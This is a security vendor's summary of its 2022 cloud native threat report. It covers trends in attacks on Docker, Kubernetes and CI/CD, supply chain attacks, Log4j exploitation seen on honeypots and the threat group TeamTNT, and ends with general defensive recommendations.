As companies continue to adopt cloud native technologies at a rapid pace, an increasing number of cyber threats are targeting the cloud native environment. To defend against these threats, security practitioners must stay abreast of attackers’ evolving tactics, techniques, and procedures. For its 2022 Cloud Native Threat report, Aqua’s Team Nautilus analyzed attacks that were observed in the wild over the past year to highlight the latest developments in the threat landscape.
While attacks are becoming more sophisticated, attackers are still always on the lookout for easy targets—and Kubernetes is becoming such a target. And although the veteran cloud native attackers Team TNT appear to be slowing their activity, traditional attack tactics are increasingly being used in the cloud native space.
Here are key takeaways from the 2022 Cloud Native Threat Report.
Threat actors’ tactics, techniques, and procedures are more sophisticated
While cryptominers remained the most common malware that was observed in 2021, attackers made increasing use of backdoors and worms. Backdoors were encountered in 54% of attacks, up 9 percentage points from 2020, and worms were used in 51% of attacks, a 10 percentage-point increase.
Team Nautilus also observed more sophisticated activity involving rootkits, fileless execution, and loading kernel modules. In cloud native environments, rootkits executed on the host can be used to hide malicious processes and to reduce the chances of detection after attackers have escaped from the containerized environment.
Attention shifts from Docker to Kubernetes and the CI/CD pipeline
Misconfigured Docker APIs were still a popular target for attackers. Effective use of public search engines, such as Shodan and Censys, and scanning tools meant that the median time it took a threat actor to detect an exposed, misconfigured Docker API was just 56 minutes.
But Team Nautilus observed a slight decline in such attacks as threat actors began to broaden their targets to include vulnerable CI/CD and Kubernetes environments. Kubernetes’ broad attack surface proved particularly enticing to threat actors. The number of malicious container images that targeted Kubernetes environments was up by 10 percentage points in 2021, to 19%.
Traditional attack tactics used to target cloud native
In 2021, Team Nautilus observed attackers using traditional tactics such as password cracking and exploiting vulnerabilities in applications in an effort to steal cloud metadata.
The implication of this activity is that attackers are using more techniques specifically reserved for applications that are running in cloud environments. This development suggests that large botnets such as Mirai, Muhstik, and Kinsing have evolved.
To get more insights into the evolving threat landscape, check out the full 2022 Cloud Native Threat Report.
Software supply chain attacks continued to surge
The software supply chain was a prime target for attacks in 2021, with the estimated number of such exploits soaring by at least 300% year-over-year. Threat actors focused their efforts on exploiting open source vulnerabilities, poisoning widely used open source packages, compromising CI/CD tools and code integrity, and manipulating the build process.
An analysis of over 1,100 container images uploaded to one of the world’s largest image libraries in the past year concluded that 13% were related to potentially unwanted applications, such as cryptominers, and 1.3% were related to malware.
The Log4j vulnerability was exploited almost immediately
The zero-day vulnerability (CVE-2021-44228) in the popular logging library Log4j, which was published in December 2021, galvanized threat actors and left organizations scrambling to determine whether—or how—they were affected.
A honeypot established by Team Nautilus detected dozens of attacks in just a few hours. Some of the attacks were distinct and attacked the honeypot only once or twice, while others targeted it every few minutes, which suggested activity by large botnets. Multiple malicious techniques were detected, including known malware, fileless execution, files that were downloaded and executed from memory, and reverse shell executions.
TeamTNT: Retired—or not?
TeamTNT, a major threat actor targeting cloud native environments, announced its retirement in December 2021. However, it was still actively attacking Team Nautilus honeypots a month later.
But because no new tactics were used, it remains unclear if the ongoing attacks were the result of still-operational automated attack infrastructure, or if TeamTNT was continuing to conduct attacks. Some of the command-and-control servers, a third-party registry, and a worm were still infecting new targets.
How to protect your organization
The migration to cloud native continues apace, for both organizations and threat actors. To develop defenses against the increasing number and variety of cyber threats that target cloud native environments, practitioners must ensure runtime security, take a layered approach to Kubernetes defenses, and implement scanning in development.